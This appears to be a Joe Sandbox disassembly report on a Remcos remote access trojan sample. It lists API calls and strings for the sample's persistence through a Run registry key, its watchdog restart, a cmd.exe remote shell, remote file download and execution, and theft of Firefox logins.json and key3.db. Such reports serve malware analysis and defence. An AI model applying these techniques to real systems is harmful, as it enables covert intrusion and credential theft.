GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ltlbVjClX9.exe,00000104), ref: 0040E9EE

Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C

Strings

Exe, xrefs: 0040EB14
PG, xrefs: 0040F036
license_code.txt, xrefs: 0040EA4D
PG, xrefs: 0040F187
PG, xrefs: 0040ED7B
PG, xrefs: 0040F103
Inj, xrefs: 0040EBD5, 0040EBEC
User, xrefs: 0040F28E
PG, xrefs: 0040F12B
del, xrefs: 0040F2D1
Software\, xrefs: 0040EAC3
PSG, xrefs: 0040F224
Rmc-0ZPVF8, xrefs: 0040EB05, 0040EB62
PG, xrefs: 0040EDD3
licence, xrefs: 0040EF88
PG, xrefs: 0040EA96
Administrator, xrefs: 0040F287
PG, xrefs: 0040F0D8
PG, xrefs: 0040ED47
Exe, xrefs: 0040EB0F
Remcos Agent initialized, xrefs: 0040EFEF
8SG, xrefs: 0040EF1D
exepath, xrefs: 0040EE92, 0040EF40
dMG, xrefs: 0040F1A8
PG, xrefs: 0040EF66
PG, xrefs: 0040EA5D
del, xrefs: 0040F2ED, 0040F36F
PG, xrefs: 0040F1C7
PG, xrefs: 0040F154
PG, xrefs: 0040EEAC
Access Level: , xrefs: 0040F29F
PG, xrefs: 0040F1F3
8SG, xrefs: 0040EE65
C:\Users\user\Desktop\ltlbVjClX9.exe, xrefs: 0040E9E6, 0040EE0F

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
String ID: 8SG$8SG$Access Level: $Administrator$C:\Users\user\Desktop\ltlbVjClX9.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-0ZPVF8$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
API String ID: 2830904901-2656932549
Opcode ID: ec3be0c163fc69a5cec59076c743d838c4055e46bccd875f542b38000b1dd708
Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
Opcode Fuzzy Hash: ec3be0c163fc69a5cec59076c743d838c4055e46bccd875f542b38000b1dd708
Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0040CE07
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
CopyFileW.KERNELBASE(C:\Users\user\Desktop\ltlbVjClX9.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
_wcslen.LIBCMT ref: 0040CEE6
CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
CopyFileW.KERNEL32(C:\Users\user\Desktop\ltlbVjClX9.exe,00000000,00000000), ref: 0040CF84
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
_wcslen.LIBCMT ref: 0040CFC6
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
ExitProcess.KERNEL32 ref: 0040D062

Strings

open, xrefs: 0040D044
6, xrefs: 0040CEDA
del, xrefs: 0040CFF5
C:\Users\user\Desktop\ltlbVjClX9.exe, xrefs: 0040CE91, 0040CE96, 0040CEC9, 0040CF7E, 0040CF83, 0040CF8A, 0040CFEB

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
String ID: 6$C:\Users\user\Desktop\ltlbVjClX9.exe$del$open
API String ID: 1579085052-4084181854
Opcode ID: 004f8c35252fee51f9524e56f4f71560d144df2794a5d85e84d8a8f74650fc3d
Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
Opcode Fuzzy Hash: 004f8c35252fee51f9524e56f4f71560d144df2794a5d85e84d8a8f74650fc3d
Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E

Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040DB9A

Strings

Temp, xrefs: 0040DA66
ProgramFiles, xrefs: 0040DB6E
ProgramData, xrefs: 0040DB5F
AppData, xrefs: 0040DB51
\SysWOW64, xrefs: 0040DB00
UserProfile, xrefs: 0040DB58
SystemDrive, xrefs: 0040DA91
\system32, xrefs: 0040DAAE
WinDir, xrefs: 0040DA9B, 0040DABD, 0040DB0F

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
Opcode Fuzzy Hash: 05c2ad93f6cc2ee26ed5624d475cb04337695bae26b39c69aed6eb4faf56ef7b
Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

Function 0213003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0213024D

Strings

kernel32.dll, xrefs: 0213008F, 02130095
cess, xrefs: 0213018D

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 4d62c31e7b113053c7fec1a81403a43082a4b2b429e0d1c2d19d79fb67bed87b
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 9F527975A01229DFDB65CF58C984BACBBB1BF09304F1580E9E94DAB351DB30AA85CF14

Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF

Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2

StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C

Strings

CurrentBuildNumber, xrefs: 0041B31D
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0041B2D7, 0041B2E1, 0041B322
(32 bit), xrefs: 0041B36F
ProductName, xrefs: 0041B2D2
(64 bit), xrefs: 0041B368

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentOpenQueryValueWow64
String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 782494840-2070987746
Opcode ID: 103398b8c94679706535ed23794d8536241afc2f4aee58ad483283dca0179624
Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
Opcode Fuzzy Hash: 103398b8c94679706535ed23794d8536241afc2f4aee58ad483283dca0179624
Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE

Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
RegSetValueExW.KERNELBASE(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,759237E0,?), ref: 0041384D
RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,759237E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 1818849710-1051519024
Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94

Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
GetLastError.KERNEL32 ref: 0040D083

Strings

Rmc-0ZPVF8, xrefs: 0040D069

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: Rmc-0ZPVF8
API String ID: 1925916568-1485666958
Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519

Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
RegCloseKey.ADVAPI32(?), ref: 004135F2

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 2c354c38eb467919e259a426341f00e1060616e4a77f0ac470f93c7e2a8fe8f5
Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
Opcode Fuzzy Hash: 2c354c38eb467919e259a426341f00e1060616e4a77f0ac470f93c7e2a8fe8f5
Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4

Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
RegCloseKey.ADVAPI32(00000000), ref: 00413592

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94

Function 00654DEE Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00654E16
Module32First.KERNEL32(00000000,00000224), ref: 00654E36

Memory Dump Source

Source File: 00000000.00000002.2409581166.0000000000654000.00000040.00000020.00020000.00000000.sdmp, Offset: 00654000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_654000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: ff8b34312b6a536e03558d41177a98d97e6bb388d8ffcdcc34b04c3b46c67c89
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 72F09C356007116BD7203BF99C8DBAF76E9BF4572AF100568EA56D11C0DF70EC894661

Function 02130E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02130223,?,?), ref: 02130E19
SetErrorMode.KERNELBASE(00000000,?,?,02130223,?,?), ref: 02130E1E

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 141337286ceb6be3880347a732b0624d5417ee66cd2ec71782f629bcf62dde42
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 7DD0123124512877D7013A94DC09BCD7B5CDF09B66F108021FB0DD9080C770954046E5

Function 00654AAD Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00654AFE

Memory Dump Source

Source File: 00000000.00000002.2409581166.0000000000654000.00000040.00000020.00020000.00000000.sdmp, Offset: 00654000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_654000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: e9dc2285b3de7efcc8bf7724fad4c6f1863da59ae2c09c1cf7da7ca0413f0c41
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 81113979A00208EFDB01DF98C985E98BBF5AF08355F1580A4F9489B362D771EA90DF80

Non-executed Functions

Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00407CB9
GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
DeleteFileW.KERNEL32(00000000), ref: 00407DA9

Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
DeleteFileA.KERNEL32(?), ref: 00408652

Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF

Sleep.KERNEL32(000007D0), ref: 004086F8
StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A

Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7

Strings

Deleted file: , xrefs: 00407DC8
XPG, xrefs: 004082E7
Failed to download file: , xrefs: 004080A5
XPG, xrefs: 00407DED
(PG, xrefs: 004081F2
open, xrefs: 00408191
XPG, xrefs: 00408430
Downloaded file: , xrefs: 0040802E
XPG, xrefs: 00408718
Downloading file: , xrefs: 00407F7D
Executing file: , xrefs: 004081AD
Unable to rename file!, xrefs: 00408413
Browsing directory: , xrefs: 00408238
Unable to delete: , xrefs: 00407E07
NG, xrefs: 00407CE5

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
API String ID: 1067849700-181434739
Opcode ID: cc92efd7091489a96eeaa7b565f828fef6cb67f6d1d96342901a165f5f4a7e91
Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
Opcode Fuzzy Hash: cc92efd7091489a96eeaa7b565f828fef6cb67f6d1d96342901a165f5f4a7e91
Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B

Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004056E6

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

__Init_thread_footer.LIBCMT ref: 00405723
CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
TerminateProcess.KERNEL32(00000000), ref: 00405A17
CloseHandle.KERNEL32 ref: 00405A23
CloseHandle.KERNEL32 ref: 00405A2B
CloseHandle.KERNEL32 ref: 00405A3D
CloseHandle.KERNEL32 ref: 00405A45

Strings

0lG, xrefs: 00405954
0lG, xrefs: 004056D0
cmd.exe, xrefs: 0040574D
kG, xrefs: 004057DB
SystemDrive, xrefs: 00405761
0lG, xrefs: 00405988
0lG, xrefs: 00405A2D
0lG, xrefs: 0040585A

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
API String ID: 2994406822-18413064
Opcode ID: 1f8d4a4c6a963acf1e19145fbc82ad777ae7c02ea95b939812f35296a3c20cf2
Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
Opcode Fuzzy Hash: 1f8d4a4c6a963acf1e19145fbc82ad777ae7c02ea95b939812f35296a3c20cf2
Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D

Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00412106

Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
CloseHandle.KERNEL32(00000000), ref: 00412155
CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A

Strings

rmclient.exe, xrefs: 004122EA
\system32\, xrefs: 00412209
Watchdog launch failed!, xrefs: 00412383
\SysWOW64\, xrefs: 00412261
svchost.exe, xrefs: 004122C5
fsutil.exe, xrefs: 0041230F
WinDir, xrefs: 0041221B, 00412270
Remcos restarted by watchdog!, xrefs: 00412160
Watchdog module activated, xrefs: 00412184, 004123DC
WDH, xrefs: 004121B5, 004121BB, 00412420

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
API String ID: 3018269243-13974260
Opcode ID: 90412c5b1cbcf88d1662316425d270951f9ea833c6ef2cc02fc24acd5fdbc1d9
Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
Opcode Fuzzy Hash: 90412c5b1cbcf88d1662316425d270951f9ea833c6ef2cc02fc24acd5fdbc1d9
Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E

Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
FindClose.KERNEL32(00000000), ref: 0040BBC9
FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
FindClose.KERNEL32(00000000), ref: 0040BD12

Strings

[Firefox StoredLogins not found], xrefs: 0040BBD4
\logins.json, xrefs: 0040BC34
[Firefox StoredLogins Cleared!], xrefs: 0040BCFF
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BB52
UserProfile, xrefs: 0040BB60
\key3.db, xrefs: 0040BC76

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

